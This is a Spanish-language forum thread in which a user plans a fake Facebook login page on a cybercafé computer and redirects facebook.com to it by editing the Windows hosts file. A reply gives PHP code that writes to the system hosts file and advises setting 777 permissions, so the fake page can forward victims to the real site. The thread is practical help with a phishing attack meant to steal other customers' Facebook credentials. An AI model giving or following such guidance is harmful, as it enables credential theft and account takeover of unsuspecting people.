Duda redireccion

Iniciado por DarkXploitz, Enero 28, 2016, 08:25:43 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 28, 2016, 08:25:43 AM Ultima modificación: Enero 28, 2016, 08:11:15 PM por Expermicid
hola me estoy creando un fake de facebook para ponerlo en un cyber, en una pc voy a redireccionar el archivo host de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a mi facebook.fake hasta hay todo bien, ahora mi duda es que en mi codigo php yo redireciono a la pagina facebook original pero al haber modificado el host siempre me va a redireccionar a la pagina fake una y otra ves en un bucle infinito, hay alguna manera de que la fake redirecione a la original sin que me afecte el cambio que hice al host  :-\
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses

Enero 28, 2016, 09:33:41 AM #1 Ultima modificación: Enero 28, 2016, 08:12:30 PM por Expermicid
Mmm se me ocurre que quizás puedas modificar de nuevo el /etc/host desde php antes de reedirigir a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, aunque la verdad, es que nunca lo hice:

Código: php
<?php
$file = fopen("C:\Windows\System32\drivers\etc\hosts", "a");
fwrite($file, "www.facebook.com                  www.facebook.fake" . PHP_EOL);
fclose($file);
?>

Añádele permisos 777 al fichero.

De lo contrario, puedes intentar jugar los subdominios de facebook.

Si se me ocurre algo más, te lo comento.

Saludos.

Enero 28, 2016, 10:06:13 AM #2 Ultima modificación: Enero 28, 2016, 08:13:24 PM por Expermicid
ok gracias voy a probar y comento resultados
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses